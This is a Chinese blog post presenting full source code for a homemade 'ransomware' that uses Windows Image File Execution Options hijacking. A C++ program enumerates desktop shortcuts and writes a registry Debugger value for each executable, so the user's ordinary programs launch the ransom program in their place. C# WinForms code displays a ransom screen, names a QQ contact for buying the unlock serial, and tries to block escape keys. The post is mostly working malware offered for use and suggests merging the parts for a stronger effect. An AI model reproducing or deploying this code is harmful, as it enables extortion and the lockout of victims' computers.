基于windows下的映像劫持实现“勒索病毒”

最新推荐文章于 2024-08-17 01:03:53 发布
最新推荐文章于 2024-08-17 01:03:53 发布
阅读量5.2w 收藏 7
点赞数 1
分类专栏: 映像劫持 网络安全 勒索病毒 文章标签: 勒索病毒 网络安全 映像劫持 C/C++ C#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27180763/article/details/82556565
版权

基于windows下的映像劫持实现“勒索病毒”

.
##什么是映像劫持?
关于映像劫持,我曾经在博客中给大家讲过,在此就不再阐述了。
附上文章传送门:https://blog.csdn.net/qq_27180763/article/details/82556058

##什么是勒索病毒?
勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。
而我们这里,仅仅只是利用映像劫持技术,来实现用户正常软件无法打开,从而实现勒索目的。

##C/C++实现映像劫持源代码

#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
class Hacker {
public:
    Hacker()
    {
        Path = this->getDesktopPath();
        GetAllgpxFilepathFromfolder(Path);
    }
private:
    string Path;
public:
    list<string> FileName;
private:
    string  getDesktopPath()        //获取桌面路径
    {
        LPITEMIDLIST pidl;
        LPMALLOC pShellMalloc;
        char szDir[200];
        if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
        {
            if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
                // 如果成功返回true  
                SHGetPathFromIDListA(pidl, szDir);
                pShellMalloc->Free(pidl);
            }
            pShellMalloc->Release();
        }

        return string(szDir);
    }

private:
    int  GetAllgpxFilepathFromfolder(string Path)
    {
        char szFind[MAX_PATH];
        WIN32_FIND_DATA FindFileData;
        strcpy(szFind, Path.c_str());
        strcat(szFind, "\\*.*");
        HANDLE hFind = FindFirstFile(szFind, &FindFileData);
        if (INVALID_HANDLE_VALUE == hFind)  return -1;
        do
        {
            if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
                {
                    //发现子目录,递归之
                    char szFile[MAX_PATH] = { 0 };
                    strcpy(szFile, Path.c_str());
                    strcat(szFile, "\\");
                    strcat(szFile, FindFileData.cFileName);
                    GetAllgpxFilepathFromfolder(szFile);
                }
            }else{
                FileName.push_back(FindFileData.cFileName);
            }
        } while (FindNextFile(hFind, &FindFileData));
        FindClose(hFind);
        return 0;
    }
};

void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
    std::size_t found = S.find(A);
    while (std::string::npos != found) {
        S.replace(found, A.length(), B);
        found = S.find(A, found + 1);
    }
}
int main()
{
    Hacker* one = new Hacker();
    string arr;
    for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
    {
        replaceA_to_B(*itor, ".lnk", ".exe");
        int pos = 0;
        pos =(*itor).find(".exe");
        if (-1 != pos)
        {
            *itor = (*itor).substr(0, pos+4);
        }
    }
    for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
    {
        arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + "  /v Debugger /t REG_SZ /d \"勒索病毒名称.exe\" /f";
        system(arr.c_str());
    }
    system("pause");
    return 0;
}

#基于c#实现勒索病毒:

#####Form1.Designer.cs:

namespace Extortion_virus
{
    partial class Form1
    {
        /// <summary>
        /// 必需的设计器变量。
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// 清理所有正在使用的资源。
        /// </summary>
        /// <param name="disposing">如果应释放托管资源,为 true;否则为 false。</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows 窗体设计器生成的代码

        /// <summary>
        /// 设计器支持所需的方法 - 不要修改
        /// 使用代码编辑器修改此方法的内容。
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
            this.pictureBox1 = new System.Windows.Forms.PictureBox();
            this.label1 = new System.Windows.Forms.Label();
            this.label2 = new System.Windows.Forms.Label();
            this.label3 = new System.Windows.Forms.Label();
            this.label4 = new System.Windows.Forms.Label();
            this.button1 = new System.Windows.Forms.Button();
            this.backgroundWorker1 = new System.ComponentModel.BackgroundWorker();
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
            this.SuspendLayout();
            // 
            // pictureBox1
            // 
            this.pictureBox1.BackColor = System.Drawing.Color.Yellow;
            this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
            this.pictureBox1.Location = new System.Drawing.Point(0, -1);
            this.pictureBox1.Name = "pictureBox1";
            this.pictureBox1.Size = new System.Drawing.Size(515, 302);
            this.pictureBox1.TabIndex = 0;
            this.pictureBox1.TabStop = false;
            // 
            // label1
            // 
            this.label1.AutoSize = true;
            this.label1.BackColor = System.Drawing.Color.Turquoise;
            this.label1.Font = new System.Drawing.Font("楷体", 21.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
            this.label1.ForeColor = System.Drawing.Color.DarkOrange;
            this.label1.Location = new System.Drawing.Point(125, 29);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(253, 29);
            this.label1.TabIndex = 1;
            this.label1.Text = "Extortion virus";
            // 
            // label2
            // 
            this.label2.AutoSize = true;
            this.label2.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
            this.label2.ForeColor = System.Drawing.Color.Chartreuse;
            this.label2.Location = new System.Drawing.Point(52, 88);
            this.label2.Name = "label2";
            this.label2.Size = new System.Drawing.Size(422, 17);
            this.label2.TabIndex = 2;
            this.label2.Text = "Your computer is paralyzed and unable to work.";
            // 
            // label3
            // 
            this.label3.AutoSize = true;
            this.label3.Font = new System.Drawing.Font("楷体", 13F);
            this.label3.ForeColor = System.Drawing.Color.Chartreuse;
            this.label3.Location = new System.Drawing.Point(52, 119);
            this.label3.Name = "label3";
            this.label3.Size = new System.Drawing.Size(422, 18);
            this.label3.TabIndex = 3;
            this.label3.Text = " If you need to continue to use your computer,";
            // 
            // label4
            // 
            this.label4.AutoSize = true;
            this.label4.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
            this.label4.ForeColor = System.Drawing.Color.Chartreuse;
            this.label4.Location = new System.Drawing.Point(152, 161);
            this.label4.Name = "label4";
            this.label4.Size = new System.Drawing.Size(188, 17);
            this.label4.TabIndex = 4;
            this.label4.Text = "please click unlock.";
            // 
            // button1
            // 
            this.button1.BackColor = System.Drawing.SystemColors.GradientActiveCaption;
            this.button1.Font = new System.Drawing.Font("楷体", 25F);
            this.button1.ForeColor = System.Drawing.Color.Crimson;
            this.button1.Location = new System.Drawing.Point(150, 232);
            this.button1.Name = "button1";
            this.button1.Size = new System.Drawing.Size(190, 52);
            this.button1.TabIndex = 5;
            this.button1.Text = "Unlock";
            this.button1.UseVisualStyleBackColor = false;
            this.button1.Click += new System.EventHandler(this.button1_Click);
            // 
            // Form1
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(515, 296);
            this.Controls.Add(this.button1);
            this.Controls.Add(this.label4);
            this.Controls.Add(this.label3);
            this.Controls.Add(this.label2);
            this.Controls.Add(this.label1);
            this.Controls.Add(this.pictureBox1);
            this.Name = "Form1";
            this.Text = "Form1";
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();

        }

        #endregion

        private System.Windows.Forms.PictureBox pictureBox1;
        private System.Windows.Forms.Label label1;
        private System.Windows.Forms.Label label2;
        private System.Windows.Forms.Label label3;
        private System.Windows.Forms.Label label4;
        private System.Windows.Forms.Button button1;
        private System.ComponentModel.BackgroundWorker backgroundWorker1;
    }
}

#####From1.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            KeyPreview = true;
            this.ShowInTaskbar = false;
            ControlBox = false;
            this.MaximizeBox = false;
            this.MinimizeBox = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Extortion virus";
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
            FormBorderStyle = FormBorderStyle.FixedSingle;
            pictureBox1.BackColor = Color.Transparent;
            label1.BackColor = Color.Transparent;
            label1.Parent = pictureBox1;

            label2.BackColor = Color.Transparent;
            label2.Parent = pictureBox1;

            label3.BackColor = Color.Transparent;
            label3.Parent = pictureBox1;

            label4.BackColor = Color.Transparent;
            label4.Parent = pictureBox1;

        }
        private void Form1_KeyDown(object sender, KeyEventArgs e)
        {
            if (e.Modifiers == Keys.Control && e.KeyCode == Keys.Delete && e.Modifiers ==Keys.Alt)
            {
                MessageBox.Show("You cannot open task manager now.");
            }
            if ((e.Modifiers == Keys.LWin || e.Modifiers == Keys.RWin) && e.Modifiers == Keys.R)
            {
                MessageBox.Show("You are prohibited from running the process now.");
            }
            if (e.Modifiers == Keys.RWin || e.Modifiers == Keys.LWin) {
                MessageBox.Show("You are not allowed to do anything.");
            }
            if (e.Modifiers == Keys.Alt && e.Modifiers == Keys.F4)
            {
                MessageBox.Show("Sorry, I really don't want to see you do this.");
            }
        }
        private void button1_Click(object sender, EventArgs e)
        {
            this.Hide();
            Form2 f2 = new Form2();
            f2.Show();
        }
    }
}

#####Form2.Designer.cs

namespace Extortion_virus
{
    partial class Form2
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows Form Designer generated code

        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form2));
            this.pictureBox1 = new System.Windows.Forms.PictureBox();
            this.label1 = new System.Windows.Forms.Label();
            this.label2 = new System.Windows.Forms.Label();
            this.richTextBox1 = new System.Windows.Forms.RichTextBox();
            this.label3 = new System.Windows.Forms.Label();
            this.label4 = new System.Windows.Forms.Label();
            this.label5 = new System.Windows.Forms.Label();
            this.label6 = new System.Windows.Forms.Label();
            this.label7 = new System.Windows.Forms.Label();
            this.button1 = new System.Windows.Forms.Button();
            this.button2 = new System.Windows.Forms.Button();
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
            this.SuspendLayout();
            // 
            // pictureBox1
            // 
            this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
            this.pictureBox1.Location = new System.Drawing.Point(1, 0);
            this.pictureBox1.Name = "pictureBox1";
            this.pictureBox1.Size = new System.Drawing.Size(536, 306);
            this.pictureBox1.TabIndex = 0;
            this.pictureBox1.TabStop = false;
            // 
            // label1
            // 
            this.label1.AutoSize = true;
            this.label1.BackColor = System.Drawing.Color.WhiteSmoke;
            this.label1.Font = new System.Drawing.Font("楷体", 15F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
            this.label1.ForeColor = System.Drawing.SystemColors.MenuHighlight;
            this.label1.Location = new System.Drawing.Point(72, 29);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(427, 20);
            this.label1.TabIndex = 1;
            this.label1.Text = "Please input your poison serial number";
            // 
            // label2
            // 
            this.label2.AutoSize = true;
            this.label2.BackColor = System.Drawing.SystemColors.GrayText;
            this.label2.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label2.ForeColor = System.Drawing.SystemColors.MenuHighlight;
            this.label2.Location = new System.Drawing.Point(12, 70);
            this.label2.Name = "label2";
            this.label2.Size = new System.Drawing.Size(559, 20);
            this.label2.TabIndex = 2;
            this.label2.Text = "if not, please contact QQ: \"1152193204\" to get it.";
            // 
            // richTextBox1
            // 
            this.richTextBox1.Location = new System.Drawing.Point(169, 142);
            this.richTextBox1.Name = "richTextBox1";
            this.richTextBox1.Size = new System.Drawing.Size(282, 116);
            this.richTextBox1.TabIndex = 3;
            this.richTextBox1.Text = "";
            // 
            // label3
            // 
            this.label3.AutoSize = true;
            this.label3.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label3.ForeColor = System.Drawing.Color.Goldenrod;
            this.label3.Location = new System.Drawing.Point(104, 142);
            this.label3.Name = "label3";
            this.label3.Size = new System.Drawing.Size(30, 20);
            this.label3.TabIndex = 4;
            this.label3.Text = "解";
            // 
            // label4
            // 
            this.label4.AutoSize = true;
            this.label4.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label4.ForeColor = System.Drawing.Color.Goldenrod;
            this.label4.Location = new System.Drawing.Point(104, 171);
            this.label4.Name = "label4";
            this.label4.Size = new System.Drawing.Size(30, 20);
            this.label4.TabIndex = 5;
            this.label4.Text = "密";
            // 
            // label5
            // 
            this.label5.AutoSize = true;
            this.label5.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label5.ForeColor = System.Drawing.Color.Goldenrod;
            this.label5.Location = new System.Drawing.Point(104, 198);
            this.label5.Name = "label5";
            this.label5.Size = new System.Drawing.Size(30, 20);
            this.label5.TabIndex = 6;
            this.label5.Text = "序";
            // 
            // label6
            // 
            this.label6.AutoSize = true;
            this.label6.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label6.ForeColor = System.Drawing.Color.Goldenrod;
            this.label6.Location = new System.Drawing.Point(104, 226);
            this.label6.Name = "label6";
            this.label6.Size = new System.Drawing.Size(30, 20);
            this.label6.TabIndex = 7;
            this.label6.Text = "列";
            // 
            // label7
            // 
            this.label7.AutoSize = true;
            this.label7.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
            this.label7.ForeColor = System.Drawing.Color.Goldenrod;
            this.label7.Location = new System.Drawing.Point(104, 254);
            this.label7.Name = "label7";
            this.label7.Size = new System.Drawing.Size(30, 20);
            this.label7.TabIndex = 8;
            this.label7.Text = "号";
            // 
            // button1
            // 
            this.button1.Font = new System.Drawing.Font("宋体", 10F);
            this.button1.Location = new System.Drawing.Point(281, 264);
            this.button1.Name = "button1";
            this.button1.Size = new System.Drawing.Size(75, 23);
            this.button1.TabIndex = 9;
            this.button1.Text = "clear";
            this.button1.UseVisualStyleBackColor = true;
            this.button1.Click += new System.EventHandler(this.button1_Click);
            // 
            // button2
            // 
            this.button2.Font = new System.Drawing.Font("宋体", 10F);
            this.button2.Location = new System.Drawing.Point(376, 264);
            this.button2.Name = "button2";
            this.button2.Size = new System.Drawing.Size(75, 23);
            this.button2.TabIndex = 10;
            this.button2.Text = "submit";
            this.button2.UseVisualStyleBackColor = true;
            this.button2.Click += new System.EventHandler(this.button2_Click);
            // 
            // Form2
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(537, 303);
            this.Controls.Add(this.button2);
            this.Controls.Add(this.button1);
            this.Controls.Add(this.label7);
            this.Controls.Add(this.label6);
            this.Controls.Add(this.label5);
            this.Controls.Add(this.label4);
            this.Controls.Add(this.label3);
            this.Controls.Add(this.richTextBox1);
            this.Controls.Add(this.label2);
            this.Controls.Add(this.label1);
            this.Controls.Add(this.pictureBox1);
            this.Name = "Form2";
            this.Text = "Form2";
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();

        }

        #endregion

        private System.Windows.Forms.PictureBox pictureBox1;
        private System.Windows.Forms.Label label1;
        private System.Windows.Forms.Label label2;
        private System.Windows.Forms.RichTextBox richTextBox1;
        private System.Windows.Forms.Label label3;
        private System.Windows.Forms.Label label4;
        private System.Windows.Forms.Label label5;
        private System.Windows.Forms.Label label6;
        private System.Windows.Forms.Label label7;
        private System.Windows.Forms.Button button1;
        private System.Windows.Forms.Button button2;
    }
}

#####From2.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
    public partial class Form2 : Form
    {
        public Form2()
        {
            InitializeComponent();
            this.ShowInTaskbar = false;
            ControlBox = false;
            this.MaximizeBox = false;
            this.MinimizeBox = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Extortion virus";
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
            FormBorderStyle = FormBorderStyle.FixedSingle;
            pictureBox1.BackColor = Color.Transparent;
            label1.BackColor = Color.Transparent;
            label1.Parent = pictureBox1;

            label2.BackColor = Color.Transparent;
            label2.Parent = pictureBox1;

            label3.BackColor = Color.Transparent;
            label3.Parent = pictureBox1;

            label4.BackColor = Color.Transparent;
            label4.Parent = pictureBox1;

            label5.BackColor = Color.Transparent;
            label5.Parent = pictureBox1;

            label6.BackColor = Color.Transparent;
            label6.Parent = pictureBox1;

            label7.BackColor = Color.Transparent;
            label7.Parent = pictureBox1;
        }

        private void button1_Click(object sender, EventArgs e)
        {
            richTextBox1.Clear();
        }

        private void button2_Click(object sender, EventArgs e)
        {
            if (richTextBox1.Text == "1152193204") {
                MessageBox.Show("Thank you for buying our service, but your computer will not return to normal.");
            }
            else { 
                MessageBox.Show("Your serial number is wrong. Please try again.");
            }
        }
    }
}

###代码执行后效果图
实际效果图

###这里由于C#比C++开发快捷,故使用了C#的winfrom。在此我只设置了winfrom程序在任务栏隐藏,并不允许调整大小,删除关闭安全。检测用户按键。
###如果需要更好的效果,可以把两个程序合在一起,使用MFC或者QT来实现一个勒索病毒的效果。

程序小黑
关注
专栏目录
【应急响应】Windows应急响应手册(勒索病毒篇)
做自己喜欢的事,并将其发挥到极致!
07-19 120
本篇内容围绕勒索病毒事件进行分析,通过使用技术手段来确定勒索病毒家族并寻找解密方法,实战中过程中可参考文中部分内容提供一些帮助!
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
windows映像劫持
jandroid
02-02 169
 基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把它放在哪个位置,或者是一个程序重新用安装盘修复过,都出现无法运行的情况,或是出错提示为“找不到文件”或者直接没有运行起来的反应,或者是比如运行程序A却成了执行B(可能是病毒),而改名后却可以正常运行的现象。   遭遇流行“映像劫持病毒的系统表现为常见的杀毒软件、防火墙、安全检测工具等均提示“找不到文件”或执行了没有反应,于是大部分用...
应急响应:勒索病毒-实战 案例一.【Windows 系统-排查和解密】
最新发布
网络安全领域___专研者.
08-17 1014
勒索病毒是一种恶意软件,它通过加密用户的数据或锁定用户设备,然后要求用户支付赎金以解锁数据或系统。勒索病毒的入侵方式多样,包括网络共享文件、捆绑传播、垃圾邮件、水坑攻击、软件供应链传播、暴力破解、利用已知漏洞攻击和利用高危端口攻击等。
(经典)详解WINDOWS映像劫持技术
yxyhack's blog
09-21 4870
一. 诡异的中毒现象在成品检验科文员办公室的一台电脑上折腾半个小时后,计算机维护部门的技术员只觉得眼皮不停狂跳,因为从刚开始接手这个任务开始,他就一直在做无用功:他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没,无论他直接在U盘上运行还是随便复制到哪个目录里,系统都是报告“找不到文件”或者直接没有运行起来的反应,他第一次感受到了恐惧,文件分明就好好的在眼皮底下,可它们就是“找不到”或死
[病毒木马] Windows 映像劫持
LYSM
03-19 1010
介绍 映像劫持(Image File Execution Options),简单的解释就是,当你执行某一程序A的时候,运行的却是另外一个程序B。 实现 通过修改注册表实现。 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options ...
Python实现简易勒索病毒
m0_56375711的博客
03-06 5707
python实现简易的勒索病毒(使用非对称加密算法RSA)
调戏木马病毒的正确姿势-基础篇
wodafa的博客
03-01 5182
目录 ----------------------理论基础篇-------------------    从科幻小说说起:         危险的潘多拉盒子         来说说应用程序编程接口         工欲善其事必先利其器         (*)正确地作死         (*)被劫持的应用程序接口         (***)Hook与QQ密码的战争        
[系统安全] 四十九.恶意软件分析 (5)Cape沙箱分析结果Report报告的API序列批量提取详解
杨秀璋的专栏
04-11 3115
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文详细介绍Cape沙箱批量分析,通过调用Python脚本文件submit.py来实施批量处理。这篇文章将讲解如何将Cape沙箱分析结果Report报告的API序列批量提取,主要是提取Json文件的内容并存储至指定位置。基础性文章,希望对您有帮助,如果存在错误或不足之处,还请海涵。且看且珍惜!
[网络安全自学篇] 六十二.PE文件逆向之PE文件解析、PE编辑工具使用和PE结构修改(三)
杨秀璋的专栏
03-25 1万+
本系列虽然叫“网络安全自学篇”,但由于系统安全、软件安全与网络安全息息相关,作者同样会分享一些系统安全案例及基础工具用法,也是记录自己的成长史,希望大家喜欢,一起进步。前文分享了数字签名,采用Signtool工具对EXE文件进行签名,接着利用Asn1View、PEVie、010Editor等工具进行数据提取和分析。本文将详细介绍PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等,这也为后续PE病毒和恶意代码的攻防打下扎实基础。希望这篇基础文章对您有所帮助~
Windows映像劫持技术
weixin_34390996的博客
09-08 122
一、原理   所谓的映像劫持(IFEO)就是Image File Execution Options,它位于注册表的   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\键值下。由于这个项主要是用来调试程序用的,对一般用户...
WannaCry:勒索病毒WannaCry反编译
03-23
勒索病毒WannaCry反编译源码 勒索病毒WannaCry通过高危入侵“永恒之蓝”(EternalBlue)在世界范围内爆发,据报道包括美国,英国,中国,俄罗斯,西班牙,意大利,越南等百余个国家均遭受大规模攻击。 病毒名称(Virus Name):WannaCrypt,WannaCry,WanaCrypt0r,WCrypt,WCRY 加密文件类型(它要加密的文件类型是): .doc,.docx,.xls,.xlsx,.ppt,.pptx,.pst,.ost,.msg,.eml,.vsd,.vsdx,.txt,.csv,.rtf,.123和.wks ,.wk1,.pdf,.dwg,.onetoc2,.snt,.jpeg,.jpg,.docb,.docm,.dot,.dotm,.dotx,.xlsm,.xlsb,.xlw,.xlt 、. xlm,.xlc,.xltx,.xltm,.pptm
使用Windows映像劫持技术实现自动登录
qq_26270085的博客
09-21 548
单位要求办公电脑必须设置登录密码,要求密码长度不小于10,要求字母和数字混合,要求有大小写,还要求有特殊字符,最变态的是要求屏幕保护时间为1分钟,在恢复屏幕时显示登录界面 是可忍孰不可忍,叔可忍,婶也不忍,真是太变态了 于是想着自己做一个自动登录的插件。 1.登录界面如何运行指定程序 首先要解决怎么样在登录界面运行你的程序的问题 Windows登录界面好像可以增加按钮什么的,比如瑞星杀毒软件就把自己的图标放到登录界面,查了半天资料,好像要将动态库注入winlogon线程,有点太复杂了.
详解WINDOWS映像劫持技术
weixin_34406061的博客
09-03 242
一. 诡异的中毒现象在 成品检验科文员办公室的一台电脑上折腾半个小时后,计算机维护部门的技术员只觉得眼皮不停狂跳,因为从刚开始接手这个任务开始,他就一直在做无用功:他随 身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没,无论他直接在U盘上运行还是随便复制到哪个目录里,系统都是报告“找不到文件”或者直接没有 运行起来的反应,他第一次感受到了恐惧,文件分明就好好的在眼皮底...
【应急响应】————3、勒索病毒
Fly_鹏程万里
02-22 1004
0x00 前言 ​ 勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。自WannaCry勒索病毒在全球爆发之后,各种变种及新型勒索病毒层出不穷。 0x01 应急场景 ​ 某天早上,网站管理员打开OA系统,首页访问...
用 镜像劫持 技术 对付一些小病毒
baobaoupup
02-25 171
转自:http://tieba.baidu.com/f?ct=335675392&amp;tn=baiduPostBrowser&amp;sc=3089509323&amp;z=306699323&amp;pn=0&amp;rn=50&amp;lm=0&amp;word=%B2%A1%B6%BE#3089509323 针对杀毒软件,有的病毒采用了一种技术叫镜像劫持。通过这种技术可以很容易的...
Windows勒索病毒防范、解决方法全攻略
weixin_34313182的博客
11-14 556
【防御措施建议】 1、安装杀毒软件,保持安全防御功能开启,比如金山毒霸已可拦截(下载地址http://www.duba.net),微软自带的Windows Defender也可以。 2、打开Windows Update自动更新,及时升级系统。 微软在3月份已经针对NSA泄漏的漏洞发布了MS17-010升级补丁,包括本次被敲诈者蠕虫病毒利用的“永恒之蓝”...
关于病毒映像劫持
脚跟着地的专栏
10-15 1095
当前的木马、病毒似乎比较钟情于“映像劫持”,通过其达到欺骗系统和杀毒软件,进而绝杀安全软件接管系统。小水最近就遇到这种类型的木马病毒,下面把自己有关映像劫持的学习心得写下来与大家交流。screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor=hand; this.alt=Click
Windows服务启动方式与映像劫持解析
"这篇文档详细介绍了Windows服务启动的两种主要方式以及映像劫持的概念。" 在Windows操作系统中,服务的启动主要有两种形式:DLL通过svchost进程和EXE注册形式的服务。这两种方法都是由服务控制管理器(services....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序小黑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值